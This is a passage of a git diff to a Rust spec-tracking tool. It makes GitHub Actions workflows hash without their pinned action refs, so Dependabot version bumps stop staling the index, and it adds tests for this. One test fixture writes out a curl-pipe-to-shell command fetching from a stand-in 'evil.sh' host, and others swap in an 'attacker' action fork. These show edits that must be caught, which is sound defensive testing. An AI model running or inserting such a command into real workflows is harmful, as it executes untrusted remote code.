     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "27676bef8bde4e444592182e6c629c97599018220b1e67419dfbb575154eb0ae"
+  "shardHash": "54e0311282eb3a15dea98dad396495faece043895e02d7dcf108fa7b94e6b9fb"
 }

--- a/.derived/codebase-index/by-spec/063-a-stale-binary-is-not-a-stale-ledger.json
+++ b/.derived/codebase-index/by-spec/063-a-stale-binary-is-not-a-stale-ledger.json
@@ -145,5 +145,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "ed2297b38eec0153cacb1056aecac3845ef7db33d20117210dc0ff471c58652c"
+  "shardHash": "628cf70b5e28889cfbb4210b7cccac85a87f60310059c52a5a2f46ebd7a0a5bd"
 }

--- a/.derived/codebase-index/by-spec/064-the-kit-ships-the-composite-gate.json
+++ b/.derived/codebase-index/by-spec/064-the-kit-ships-the-composite-gate.json
@@ -227,5 +227,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "0ef74dc3d54a91ed32fafc03b14e5b710e7a08146816e3a84a89eeca6b159614"
+  "shardHash": "c2f95e95fbd30cd4ccf328e0debb7f85bb5b3c4dc66b154288cab672b6accbc6"
 }

--- a/.derived/codebase-index/by-spec/065-init-and-the-kit-are-one-adoption.json
+++ b/.derived/codebase-index/by-spec/065-init-and-the-kit-are-one-adoption.json
@@ -210,5 +210,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "1cdecae4236d8fd47565864c5e6ab25bad946aaeb03368da7ce869a1c4073d45"
+  "shardHash": "b9c8d2a5bae746a2387d511668035b745be9751900d7264625875c75bf157051"
 }

--- a/.derived/codebase-index/by-spec/066-the-contract-records-the-lifecycle-table.json
+++ b/.derived/codebase-index/by-spec/066-the-contract-records-the-lifecycle-table.json
@@ -91,5 +91,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "25c3a35331a68578aec421c3a1ac1944d2ad6503c6f42f2962d59a0b1108634f"
+  "shardHash": "e4df5a2b248065f80c9d6918c3d449d0d3f4cf945c70893e8edf144270c552c2"
 }

--- a/.derived/codebase-index/by-spec/067-the-docs-name-what-adopters-derived.json
+++ b/.derived/codebase-index/by-spec/067-the-docs-name-what-adopters-derived.json
@@ -108,5 +108,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "9721b24adf58eaab9176c36eaa2773a2650bea80064b16ac41a286c0f7d895c0"
+  "shardHash": "2c1c65f6ac7bf77d0e69d778d41a291b9c8cab7fd8d514621451547ddc4b3522"
 }

--- a/.derived/codebase-index/by-spec/068-a-path-scoped-rule-example.json
+++ b/.derived/codebase-index/by-spec/068-a-path-scoped-rule-example.json
@@ -175,5 +175,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "5d8cc367019e933c71fad1d8d1fa73d0f9e3a2c5d413deac476a98e9d21a6059"
+  "shardHash": "429a283932ac09607c80546bcbb158913e8f83e976dcdf6cd1040281bb272312"
 }

--- a/.derived/codebase-index/by-spec/069-the-shipped-default-hashes-what-it-names.json
+++ b/.derived/codebase-index/by-spec/069-the-shipped-default-hashes-what-it-names.json
@@ -132,5 +132,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "0b2b59fd7ce405f682ab0e49a18ba09368a8e8d1b2852e8e0d993259815738e7"
+  "shardHash": "4756111ef93350837aea5e1967fd0d6c5f6cbd8b0b4aa5f4e8fc303f3cb557c1"
 }

--- a/.derived/codebase-index/by-spec/070-a-malformed-id-is-refused-not-a-panic.json
+++ b/.derived/codebase-index/by-spec/070-a-malformed-id-is-refused-not-a-panic.json
@@ -59,5 +59,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "34ad39769b777e024c09c02e02d311873b5e5eb913efc9337cfe93462dadee51"
+  "shardHash": "a57647cb54e0c492db0512582993139d42ff1c17086ba7ff309d2cf8402539f3"
 }

--- a/.derived/codebase-index/by-spec/071-a-tag-push-is-not-a-push-to-main.json
+++ b/.derived/codebase-index/by-spec/071-a-tag-push-is-not-a-push-to-main.json
@@ -97,5 +97,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "8627346ff9077807e1c59301ca619f321b9ca06979fdb7256a198737fd1874ba"
+  "shardHash": "393adeb5280ee0fef9490fd49abc4470d5ed23b5117ca9759a0fcf586e9bad3f"
 }

--- a/.derived/codebase-index/by-spec/072-the-default-branch-is-configured-not-assumed.json
+++ b/.derived/codebase-index/by-spec/072-the-default-branch-is-configured-not-assumed.json
@@ -218,5 +218,5 @@
     "specStatus": "draft"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "48dc648460ee786cb327e77fe92f56c5bd52f72827f2699f6c0c8caafdccd9e9"
+  "shardHash": "609ba83731566074ce8e158ea98f62a6e3cdd65622db8ce15bd381516e05cbf6"
 }

--- a/.derived/codebase-index/by-spec/073-a-workflow-bump-is-not-a-governed-change.json
+++ b/.derived/codebase-index/by-spec/073-a-workflow-bump-is-not-a-governed-change.json
@@ -31,6 +31,10 @@
       {
         "path": "crates/spec-spine-core/tests/index.rs",
         "source": "spec-edge"
+      },
+      {
+        "path": "docs/adoption-guide.md",
+        "source": "spec-edge"
       }
     ],
     "resolvedUnits": [
@@ -102,6 +106,19 @@
       {
         "locations": [
           {
+            "file": "docs/adoption-guide.md"
+          }
+        ],
+        "ownership": true,
+        "sourceField": "extends",
+        "unit": {
+          "kind": "file",
+          "path": "docs/adoption-guide.md"
+        }
+      },
+      {
+        "locations": [
+          {
             "file": "docs/design/00-architecture.md"
           }
         ],
@@ -130,5 +147,5 @@
     "specStatus": "draft"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "af2c2580b9e975a87bc7f57c5e92e70521a8532ebfd4c31c52a5c1e50cfa2a44"
+  "shardHash": "6c1792c8aa5e8b0687d8f524e17731692ca96cd06f4a5235786cb3d4e6343090"
 }

--- a/.derived/codebase-index/by-spec/073-a-workflow-bump-is-not-a-governed-change.json
+++ b/.derived/codebase-index/by-spec/073-a-workflow-bump-is-not-a-governed-change.json
@@ -147,5 +147,5 @@
     "specStatus": "draft"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "6c1792c8aa5e8b0687d8f524e17731692ca96cd06f4a5235786cb3d4e6343090"
+  "shardHash": "d9b2d819e825251200efaff75e25896097908f67e3a720b42065b60131536b02"
 }

--- a/.derived/codebase-index/by-spec/074-shipped-is-not-the-same-as-working.json
+++ b/.derived/codebase-index/by-spec/074-shipped-is-not-the-same-as-working.json
@@ -237,5 +237,5 @@
     "specStatus": "draft"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "d5ffa70281cedd07214279af52536e1eb973dd88cf0e31be90fd93c96a439f24"
+  "shardHash": "1543ea51abf6cc2ebbdccce0d12fb7dbe43304666c99e1e4aee2cb221b232967"
 }

--- a/.derived/codebase-index/by-spec/075-one-name-one-freshness-verb.json
+++ b/.derived/codebase-index/by-spec/075-one-name-one-freshness-verb.json
@@ -250,5 +250,5 @@
     "specStatus": "draft"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "cc18170f7c953d125966141906f4588a4c872b08fef63e82a9ff7a7619eb7dec"
+  "shardHash": "792fb3bc9c4f849838d61463c3228ab89cc0976ac7ff79d903b2f2167520ff49"
 }

--- a/.derived/codebase-index/by-spec/076-planned-territory-is-declared-not-inferred.json
+++ b/.derived/codebase-index/by-spec/076-planned-territory-is-declared-not-inferred.json
@@ -204,5 +204,5 @@
     "specStatus": "draft"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "09f396a6b8a877b75641832372835fe9f2d42531e8ffad1fbfe0ec7d9fd66083"
+  "shardHash": "d5081758834abc940432ced071d35c55af8b4ed498ff4cfcc4b2f858ef0774f1"
 }

--- a/.derived/spec-registry/by-spec/073-a-workflow-bump-is-not-a-governed-change.json
+++ b/.derived/spec-registry/by-spec/073-a-workflow-bump-is-not-a-governed-change.json
@@ -52,10 +52,18 @@
           "kind": "file",
           "path": "crates/spec-spine-core/tests/index.rs"
         }
+      },
+      {
+        "nature": "additive",
+        "spec": "067-the-docs-name-what-adopters-derived",
+        "unit": {
+          "kind": "file",
+          "path": "docs/adoption-guide.md"
+        }
       }
     ],
     "id": "073-a-workflow-bump-is-not-a-governed-change",
-    "implementation": "pending",
+    "implementation": "in-progress",
     "kind": "tooling",
     "owner": "The spec-spine Authors",
     "references": [
@@ -94,6 +102,6 @@
     "summary": "A GitHub Actions workflow enters the index content hash as raw bytes, so a Dependabot `uses:` bump moves the global-inputs scalar and stales every shard in the repository. The bot can neither re-index nor add a waiver to its own PR body, so the PR walls on exit 2 and needs a maintainer to push a re-index commit. Spec 030 built the coupling half of this for workflows and read the freshness half as already fine; it was not, and spec 069 made that visible by fixing the default glob, then deferred the real fix as a hashing change with a migration of its own. This is that spec. A workflow folds as its governance projection, the parsed document with the pinned ref of each `uses:` reference removed and the action path kept, so a version or SHA bump is invisible to the ledger while a changed action, a `run:` or `with:` edit, an added step or an unpin all still stale it. The projection and 030's waiver classifier are required to state one rule, and the upgrade restales every workflow-bearing repository once.\n",
     "title": "A workflow bump is not a governed change"
   },
-  "shardHash": "76757ac89023d15eda9556cfcd789396c9be162b28415e2b6c5af0465d4c6626",
+  "shardHash": "c0e82d11698517825bedef266b5915b301fa30b2288e6cfcc87b65ba370c53b9",
   "specVersion": "1.1.0"
 }

--- a/.derived/spec-registry/by-spec/073-a-workflow-bump-is-not-a-governed-change.json
+++ b/.derived/spec-registry/by-spec/073-a-workflow-bump-is-not-a-governed-change.json
@@ -63,7 +63,7 @@
       }
     ],
     "id": "073-a-workflow-bump-is-not-a-governed-change",
-    "implementation": "in-progress",
+    "implementation": "complete",
     "kind": "tooling",
     "owner": "The spec-spine Authors",
     "references": [
@@ -102,6 +102,6 @@
     "summary": "A GitHub Actions workflow enters the index content hash as raw bytes, so a Dependabot `uses:` bump moves the global-inputs scalar and stales every shard in the repository. The bot can neither re-index nor add a waiver to its own PR body, so the PR walls on exit 2 and needs a maintainer to push a re-index commit. Spec 030 built the coupling half of this for workflows and read the freshness half as already fine; it was not, and spec 069 made that visible by fixing the default glob, then deferred the real fix as a hashing change with a migration of its own. This is that spec. A workflow folds as its governance projection, the parsed document with the pinned ref of each `uses:` reference removed and the action path kept, so a version or SHA bump is invisible to the ledger while a changed action, a `run:` or `with:` edit, an added step or an unpin all still stale it. The projection and 030's waiver classifier are required to state one rule, and the upgrade restales every workflow-bearing repository once.\n",
     "title": "A workflow bump is not a governed change"
   },
-  "shardHash": "c0e82d11698517825bedef266b5915b301fa30b2288e6cfcc87b65ba370c53b9",
+  "shardHash": "65438641e5b5016e59ad1979ba1da95d2c95e5d70e8279ac3ea7cf0aced0f3e0",
   "specVersion": "1.1.0"
 }

--- a/crates/spec-spine-cli/tests/couple.rs
+++ b/crates/spec-spine-cli/tests/couple.rs
@@ -535,37 +535,89 @@ fn workflow_uses_bump_auto_waives() {
          steps:\n      - uses: actions/checkout@v5\n      - run: cargo test\n",
     );
 
-    // The bump stales the ledger, because `.github/workflows/**/*` is a hashed
-    // input (spec 069 fixed the default that had made it one in name only).
-    // 030 1 reasoned that workflow freshness "is already fine" because a `file`
-    // unit carries no span; that is true of the unit and was never true of the
-    // `extra_hashed_inputs` glob beside it, which is why this repository's own
-    // workflow edits have stale every shard since spec 057. The subject of this
-    // test is the coupling half, so re-index first and then assert it.
-    let stale = index_check(root);
-    assert_eq!(
-        code(&stale),
-        2,
-        "a hashed workflow bump stales the index: {}",
-        String::from_utf8_lossy(&stale.stderr)
-    );
-    refresh(root);
-    git_in(root, &["add", "-A"]);
-    git_in(root, &["commit", "-q", "-m", "bump-action"]);
-
+    // Spec 073 3.4: the bump leaves the index FRESH, with no re-index in
+    // between. `.github/workflows/**/*` is a hashed input (spec 069 fixed the
+    // default that had made it one in name only), so before 073 this same bump
+    // moved the global-inputs scalar and staled every shard in the repository.
+    // That is the wall a Dependabot PR met: the bot has no toolchain to
+    // re-index, no write path to commit shards, and no way to put a waiver in
+    // a body it does not author. Spec 069 3.6 required this test to assert the
+    // stale-then-reindex sequence; 073 amends that, and the projection is what
+    // makes the assertion below true.
     let fresh = index_check(root);
     assert_eq!(
         code(&fresh),
         0,
-        "the re-indexed tree is fresh: {}",
+        "a `uses:` bump must leave the index fresh: {}",
         String::from_utf8_lossy(&fresh.stderr)
     );
+
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "bump-action"]);
 
     let out = couple_git(root);
     assert_eq!(code(&out), 0, "{}", String::from_utf8_lossy(&out.stderr));
     assert!(
         String::from_utf8_lossy(&out.stdout).contains("auto-waived"),
         "stdout: {}",
+        String::from_utf8_lossy(&out.stdout)
+    );
+}
+
+/// Spec 073 3.4's companion: the other direction, on the same fixture.
+///
+/// Without it the suite proves only that the projection is permissive, not
+/// that it is correct, which is the shape of assertion spec 069 3.6 was
+/// written to end. A `run:` edit is a governed change to a claimed file: it
+/// stales the ledger and it refuses the waiver.
+#[test]
+fn workflow_run_edit_stales_the_index_and_refuses_the_waiver() {
+    let tmp = tempfile::tempdir().unwrap();
+    let root = tmp.path();
+    setup_cargo(root, true);
+    write(
+        root,
+        ".github/workflows/ci.yml",
+        "name: CI\non: [push]\njobs:\n  build:\n    runs-on: ubuntu-latest\n    \
+         steps:\n      - uses: actions/checkout@v4\n      - run: cargo test\n",
+    );
+    write(
+        root,
+        "specs/002-ci/spec.md",
+        "---\nid: \"002-ci\"\ntitle: \"CI\"\nstatus: approved\ncreated: \"2026-06-09\"\n\
+         summary: \"s\"\nestablishes:\n  - \".github/workflows/ci.yml\"\n---\n# 002-ci\n## body\n",
+    );
+    git_in(root, &["init", "-q"]);
+    refresh(root);
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "base"]);
+
+    // Not a version bump: the step now runs something else.
+    write(
+        root,
+        ".github/workflows/ci.yml",
+        "name: CI\non: [push]\njobs:\n  build:\n    runs-on: ubuntu-latest\n    \
+         steps:\n      - uses: actions/checkout@v4\n      - run: cargo bench\n",
+    );
+
+    let stale = index_check(root);
+    assert_eq!(
+        code(&stale),
+        2,
+        "a `run:` edit must stale the index: {}",
+        String::from_utf8_lossy(&stale.stderr)
+    );
+
+    // Re-index so the refusal below is the coupling gate's, not staleness.
+    refresh(root);
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "run-edit"]);
+
+    let out = couple_git(root);
+    assert_eq!(
+        code(&out),
+        1,
+        "a `run:` edit must refuse the auto-waiver: {}",
         String::from_utf8_lossy(&out.stdout)
     );
 }

--- a/crates/spec-spine-core/src/dep_only.rs
+++ b/crates/spec-spine-core/src/dep_only.rs
@@ -342,6 +342,112 @@ fn uses_ref_only_differs(base: &serde_yaml::Value, head: &serde_yaml::Value) -> 
 mod tests {
     use super::*;
 
+    // ===== spec 073 3.2: the projection and this waiver state one rule =====
+
+    /// The shared matrix. Each row is a base/head workflow pair and whether
+    /// spec 030's waiver clears it.
+    ///
+    /// Spec 073 3.2 requires the two mechanisms to agree, and requires it to
+    /// be asserted over a shared matrix rather than assumed from the two
+    /// implementations looking similar. The failure it prevents is the one the
+    /// gate is worst at surfacing: a bump that self-clears the coupling gate
+    /// while still staling the ledger is precisely the wall spec 073 removes,
+    /// and it would return the moment the two rules drifted apart.
+    const WF_BASE: &str = "name: CI\njobs:\n  b:\n    runs-on: ubuntu-latest\n    \
+                           steps:\n      - uses: actions/checkout@v4\n      \
+                           - uses: local/act\n      - run: cargo test\n";
+
+    fn wf_cases() -> Vec<(&'static str, String, bool)> {
+        vec![
+            (
+                "a tag bump",
+                WF_BASE.replace("checkout@v4", "checkout@v5"),
+                true,
+            ),
+            (
+                "a SHA-pin bump",
+                WF_BASE.replace("checkout@v4", "checkout@8f152de4"),
+                true,
+            ),
+            ("no change at all", WF_BASE.to_string(), true),
+            (
+                "a changed action path",
+                WF_BASE.replace("actions/checkout@v4", "attacker/checkout@v4"),
+                false,
+            ),
+            (
+                "an unpinned action",
+                WF_BASE.replace("actions/checkout@v4", "actions/checkout"),
+                false,
+            ),
+            (
+                "a newly pinned action",
+                WF_BASE.replace("local/act", "local/act@v1"),
+                false,
+            ),
+            (
+                "a run edit",
+                WF_BASE.replace("cargo test", "cargo bench"),
+                false,
+            ),
+            (
+                "an added step",
+                WF_BASE.replace(
+                    "      - run: cargo test",
+                    "      - run: echo x\n      - run: cargo test",
+                ),
+                false,
+            ),
+            (
+                "an added key",
+                WF_BASE.replace("name: CI", "name: CI\non: [push]"),
+                false,
+            ),
+        ]
+    }
+
+    /// Both directions: a waived change leaves the projection alone, and a
+    /// change to the projection refuses the waiver. Spec 073 3.2 requires only
+    /// the first, but the two rules were written to agree case for case (the
+    /// empty-action-path form `@v1` is preserved verbatim by the projection
+    /// exactly because `uses_ref_only_differs` refuses it), so the stronger
+    /// assertion is the one that would actually catch a drift.
+    #[test]
+    fn the_projection_and_the_workflow_waiver_agree() {
+        use crate::manifest::workflow_hash_projection as proj;
+        let base_proj = proj(WF_BASE).expect("the base fixture parses");
+        for (label, head, waived) in wf_cases() {
+            assert_eq!(
+                workflow_dependency_only_change(WF_BASE, &head),
+                waived,
+                "{label}: the waiver disagrees with the matrix"
+            );
+            let head_proj = proj(&head).expect("the head fixture parses");
+            assert_eq!(
+                base_proj == head_proj,
+                waived,
+                "{label}: waived={waived} but projection-unchanged={}",
+                base_proj == head_proj
+            );
+        }
+    }
+
+    /// The one case where the two are permitted to differ, pinned so a later
+    /// reader does not mistake it for a defect: a `uses:` with an empty action
+    /// path has nothing to preserve, so the projection leaves it verbatim and
+    /// the waiver refuses it. Both are fail-closed, and the ledger stales.
+    #[test]
+    fn an_empty_action_path_is_refused_by_both() {
+        use crate::manifest::workflow_hash_projection as proj;
+        // Quoted: `@` opens a reserved indicator in YAML, so the bare form is
+        // not a parseable document at all (where both mechanisms also agree,
+        // by failing closed).
+        let base = WF_BASE.replace("actions/checkout@v4", "\"@v4\"");
+        let head = WF_BASE.replace("actions/checkout@v4", "\"@v5\"");
+        assert!(!workflow_dependency_only_change(&base, &head));
+        assert_ne!(proj(&base).unwrap(), proj(&head).unwrap());
+    }
+
     fn fc(path: &str, base: &str, head: &str) -> FileContents {
         FileContents {
             path: path.to_string(),

--- a/crates/spec-spine-core/src/manifest.rs
+++ b/crates/spec-spine-core/src/manifest.rs
@@ -332,6 +332,134 @@ pub fn cargo_hash_projection(content: &str) -> Option<String> {
     serde_json::to_string(&toml_to_json(&doc)).ok()
 }
 
+/// The governance projection of a GitHub Actions workflow (spec 073, extending
+/// the npm and cargo projections to the third ecosystem whose bumps arrive by
+/// bot). The parsed document with the pinned ref of every `uses:` reference
+/// removed and the action path kept, rendered as canonical JSON so the hash is
+/// deterministic across the release matrix (the same sorted-key path the npm
+/// and cargo projections fold through).
+///
+/// A Dependabot `uses:` bump therefore leaves the projection, and so every
+/// shard hash, unchanged; a changed action path, an unpin, a `run:` / `with:` /
+/// `env:` / `if:` edit, an added step or job, and a changed trigger all still
+/// stale it. `None` (unparseable / non-mapping) tells the caller to fall back
+/// to raw bytes: over-hashing is the fail-closed direction, and a workflow the
+/// parser rejects stales on every edit rather than silently on none.
+pub fn workflow_hash_projection(content: &str) -> Option<String> {
+    let mut doc: serde_yaml::Value = serde_yaml::from_str(content).ok()?;
+    doc.as_mapping()?;
+    strip_uses_refs(&mut doc);
+    serde_json::to_string(&yaml_to_json(&doc)).ok()
+}
+
+/// Remove the pinned ref of every `uses:` scalar, at any nesting depth.
+///
+/// A `uses:` whose value is not a string is left alone entirely, and not
+/// descended into: `dep_only::uses_ref_only_differs` requires exact equality
+/// there, and the two rules have to agree case for case (spec 073 3.2).
+fn strip_uses_refs(value: &mut serde_yaml::Value) {
+    use serde_yaml::Value::{Mapping, Sequence};
+    match value {
+        Mapping(m) => {
+            let keys: Vec<serde_yaml::Value> = m.keys().cloned().collect();
+            for k in keys {
+                let is_uses = k.as_str() == Some("uses");
+                let Some(v) = m.get_mut(&k) else { continue };
+                match (is_uses, projected_uses(v)) {
+                    (true, Some(stripped)) => *v = serde_yaml::Value::String(stripped),
+                    (true, None) => {}
+                    (false, _) => strip_uses_refs(v),
+                }
+            }
+        }
+        Sequence(s) => s.iter_mut().for_each(strip_uses_refs),
+        _ => {}
+    }
+}
+
+/// `owner/action@<ref>` projected to `owner/action@`. Anything else yields
+/// `None`, meaning preserved verbatim: a non-string value, an unpinned or
+/// local reference (`./path`, `docker://image`), and an empty action path.
+///
+/// **The action path is kept**, subpath included, because swapping which
+/// action runs is a governed change: dropping the whole `uses:` value would
+/// make replacing `actions/checkout` with a fork invisible to the ledger, and
+/// spec 030's waiver already draws the line in the same place.
+///
+/// **The `@` is kept as a marker**, so a pinned reference never projects onto
+/// the unpinned spelling of the same action. `a/b@v4` folds to `a/b@` while
+/// `a/b` stays `a/b`, so an unpin moves the hash. Projecting to a bare
+/// `owner/action`, which is how 073 3.1 words the rule, would collide the two
+/// and make unpinning invisible, contradicting the same spec's 3.5 and its
+/// summary; the marker is the reading that satisfies all three.
+fn projected_uses(value: &serde_yaml::Value) -> Option<String> {
+    let s = value.as_str()?;
+    let (path, _) = s.split_once('@')?;
+    if path.is_empty() {
+        // `@v1` has no action to preserve. `uses_ref_only_differs` refuses the
+        // waiver on it (`!ba.is_empty()`), so preserving it verbatim is what
+        // keeps the two rules in agreement in both directions.
+        return None;
+    }
+    Some(format!("{path}@"))
+}
+
+/// Deterministic YAML to JSON, so a workflow projection hashes through the same
+/// canonical (sorted-key) serializer the npm and cargo projections use.
+///
+/// Mapping keys are tagged by kind, so a key that differs in the document
+/// cannot collide here. YAML 1.2 reads `on` as a string rather than a boolean,
+/// which is the case that would otherwise matter most in a workflow.
+fn yaml_to_json(value: &serde_yaml::Value) -> serde_json::Value {
+    use serde_yaml::Value as Y;
+    match value {
+        Y::Null => serde_json::Value::Null,
+        Y::Bool(b) => serde_json::Value::Bool(*b),
+        Y::Number(n) => n
+            .as_i64()
+            .map(serde_json::Value::from)
+            .or_else(|| n.as_u64().map(serde_json::Value::from))
+            .or_else(|| {
+                n.as_f64()
+                    .and_then(serde_json::Number::from_f64)
+                    .map(serde_json::Value::Number)
+            })
+            // A non-finite float has no JSON spelling; cargo manifests fold the
+            // same way (`toml_to_json`), and a workflow carries none.
+            .unwrap_or(serde_json::Value::Null),
+        Y::String(s) => serde_json::Value::String(s.clone()),
+        Y::Sequence(s) => serde_json::Value::Array(s.iter().map(yaml_to_json).collect()),
+        Y::Mapping(m) => serde_json::Value::Object(
+            m.iter()
+                .map(|(k, v)| (yaml_key(k), yaml_to_json(v)))
+                .collect(),
+        ),
+        Y::Tagged(t) => serde_json::Value::Object(
+            [
+                (
+                    "!tag".to_string(),
+                    serde_json::Value::String(t.tag.to_string()),
+                ),
+                ("!value".to_string(), yaml_to_json(&t.value)),
+            ]
+            .into_iter()
+            .collect(),
+        ),
+    }
+}
+
+/// A mapping key as a JSON object key, prefixed by kind so the rendering is
+/// injective: a string key `1` and a number key `1` must not fold together.
+fn yaml_key(k: &serde_yaml::Value) -> String {
+    match k {
+        serde_yaml::Value::String(s) => format!("s:{s}"),
+        other => format!(
+            "y:{}",
+            serde_json::to_string(&yaml_to_json(other)).unwrap_or_default()
+        ),
+    }
+}
+
 /// Remove the cargo dependency tables at every location cargo allows them.
 fn strip_cargo_dep_tables(table: &mut toml::Table) {
     for key in CARGO_DEP_TABLES {

--- a/crates/spec-spine-core/src/shard.rs
+++ b/crates/spec-spine-core/src/shard.rs
@@ -77,7 +77,19 @@ pub fn global_inputs_hash(cfg: &Config, repo_root: &Path) -> String {
                 continue;
             }
             if let Ok(content) = fs::read_to_string(&file) {
-                pieces.push((rel, content));
+                // Spec 073 3.1: a workflow folds as its governance projection,
+                // not as raw bytes. `.github/workflows/**/*` is half the
+                // shipped default and this scalar is inside EVERY shard hash,
+                // so without the projection a one-character action-ref bump
+                // stales the whole ledger, and the bot that made it can neither
+                // re-index nor waive. Unparseable falls back to raw bytes, as
+                // the npm and cargo projections do.
+                let piece = if crate::dep_only::is_workflow_yaml(&rel) {
+                    crate::manifest::workflow_hash_projection(&content).unwrap_or(content)
+                } else {
+                    content
+                };
+                pieces.push((rel, piece));
             }
         }
     }

--- a/crates/spec-spine-core/tests/index.rs
+++ b/crates/spec-spine-core/tests/index.rs
@@ -1282,3 +1282,196 @@ fn a_superseding_spec_is_reported_as_inherited() {
         "{report:?}"
     );
 }
+
+// ── spec 073: a workflow folds as its governance projection ─────────────────
+
+/// A workflow whose bump must be invisible to the ledger, and whose every
+/// other edit must not be.
+const WF: &str = "name: CI\n\
+on:\n  push:\n    branches: [main]\n\
+jobs:\n\
+\x20 build:\n\
+\x20   runs-on: ubuntu-latest\n\
+\x20   env:\n      MODE: fast\n\
+\x20   steps:\n\
+\x20     - uses: actions/checkout@v4\n\
+\x20     - uses: actions/setup-node@8f152de45cc393bb48ce5d89d36b731f54556e65\n\
+\x20     - uses: ./.github/actions/local\n\
+\x20     - uses: some/action/sub@v1\n\
+\x20     - name: test\n        if: always()\n        run: cargo test\n";
+
+fn proj(content: &str) -> String {
+    spec_spine_core::manifest::workflow_hash_projection(content)
+        .expect("the fixture parses as a mapping")
+}
+
+/// Spec 073 3.1: only the pinned ref is dropped. A tag bump and a SHA-pin bump
+/// are the two shapes Dependabot produces, and neither is a governed change.
+#[test]
+fn a_uses_ref_bump_leaves_the_workflow_projection_unchanged() {
+    let base = proj(WF);
+    assert_eq!(base, proj(&WF.replace("checkout@v4", "checkout@v5")));
+    assert_eq!(
+        base,
+        proj(&WF.replace(
+            "8f152de45cc393bb48ce5d89d36b731f54556e65",
+            "1e31de5234b9f8995739874a8ce0492dc87873e2"
+        ))
+    );
+    // A subpath action bumps the same way, and its path is not the ref.
+    assert_eq!(
+        base,
+        proj(&WF.replace("some/action/sub@v1", "some/action/sub@v2"))
+    );
+}
+
+/// Spec 073 3.1: the action path is preserved. Dropping the whole `uses:`
+/// value would make swapping `actions/checkout` for a fork invisible to the
+/// ledger, which is the security property spec 030's waiver already relies on.
+#[test]
+fn changing_which_action_runs_changes_the_projection() {
+    let base = proj(WF);
+    assert_ne!(
+        base,
+        proj(&WF.replace("actions/checkout@v4", "attacker/checkout@v4"))
+    );
+    // The subpath is part of the identity, not part of the ref.
+    assert_ne!(
+        base,
+        proj(&WF.replace("some/action/sub@v1", "some/action/other@v1"))
+    );
+}
+
+/// Spec 073 3.1 and 3.5: unpinning is a change to the security posture, not a
+/// version bump. This is the case a bare `owner/action` projection would miss:
+/// `a/b@v4` and `a/b` would fold together and the unpin would be invisible.
+#[test]
+fn unpinning_an_action_changes_the_projection() {
+    assert_ne!(
+        proj(WF),
+        proj(&WF.replace("actions/checkout@v4", "actions/checkout"))
+    );
+}
+
+/// Spec 073 3.1: everything the projection does not recognize survives it.
+#[test]
+fn every_other_workflow_edit_changes_the_projection() {
+    let base = proj(WF);
+    for (label, head) in [
+        (
+            "run:",
+            WF.replace("cargo test", "cargo test && curl evil.sh | sh"),
+        ),
+        (
+            "with:",
+            WF.replace(
+                "- uses: actions/checkout@v4",
+                "- uses: actions/checkout@v4\n        with:\n          fetch-depth: 0",
+            ),
+        ),
+        ("env:", WF.replace("MODE: fast", "MODE: slow")),
+        ("if:", WF.replace("if: always()", "if: success()")),
+        (
+            "added step",
+            WF.replace(
+                "      - name: test",
+                "      - run: echo added\n      - name: test",
+            ),
+        ),
+        (
+            "added job",
+            WF.replace(
+                "jobs:\n",
+                "jobs:\n  other:\n    runs-on: ubuntu-latest\n    steps:\n      - run: true\n",
+            ),
+        ),
+        (
+            "trigger",
+            WF.replace("branches: [main]", "branches: [main, release]"),
+        ),
+        (
+            "runner",
+            WF.replace("runs-on: ubuntu-latest", "runs-on: macos-latest"),
+        ),
+        (
+            "local action",
+            WF.replace("./.github/actions/local", "./.github/actions/other"),
+        ),
+    ] {
+        assert_ne!(base, proj(&head), "a {label} edit must stale the ledger");
+    }
+}
+
+/// Spec 073 3.5: a comment-only or reformat-only edit leaves the parsed
+/// document unchanged, so it leaves the projection unchanged. Asserted rather
+/// than left to chance, because it is the projection's defined behavior and a
+/// reader could reasonably expect either answer.
+#[test]
+fn a_comment_or_reformat_only_workflow_edit_leaves_the_projection_unchanged() {
+    let base = proj(WF);
+    assert_eq!(base, proj(&format!("# a comment\n{WF}")));
+    assert_eq!(
+        base,
+        proj(&WF.replace("branches: [main]", "branches:\n      - main"))
+    );
+}
+
+/// Spec 073 3.1: over-hashing is the fail-closed direction. A file the parser
+/// cannot read stales on every edit rather than silently on none, which is
+/// what the npm and cargo projections already do.
+#[test]
+fn an_unparseable_workflow_falls_back_to_raw_bytes() {
+    assert!(spec_spine_core::manifest::workflow_hash_projection("a: [unclosed\n").is_none());
+    // A parseable document that is not a mapping is not a workflow either.
+    assert!(spec_spine_core::manifest::workflow_hash_projection("- just\n- a list\n").is_none());
+}
+
+/// Spec 073 3.5, end to end on a real index: the whole point of the change is
+/// that the global-inputs scalar every shard hash carries stops moving under a
+/// bump the bot cannot repair.
+#[cfg(feature = "symbol-resolution")]
+#[test]
+fn a_workflow_bump_leaves_every_shard_hash_alone_and_a_run_edit_does_not() {
+    let tmp = tempfile::tempdir().unwrap();
+    let root = tmp.path();
+    write(root, "Cargo.toml", "[workspace]\nmembers = []\n");
+    write(
+        root,
+        "spec-spine.toml",
+        "[index]\nextra_hashed_inputs = [\".github/workflows/**/*\"]\n",
+    );
+    write(
+        root,
+        "specs/001-a/spec.md",
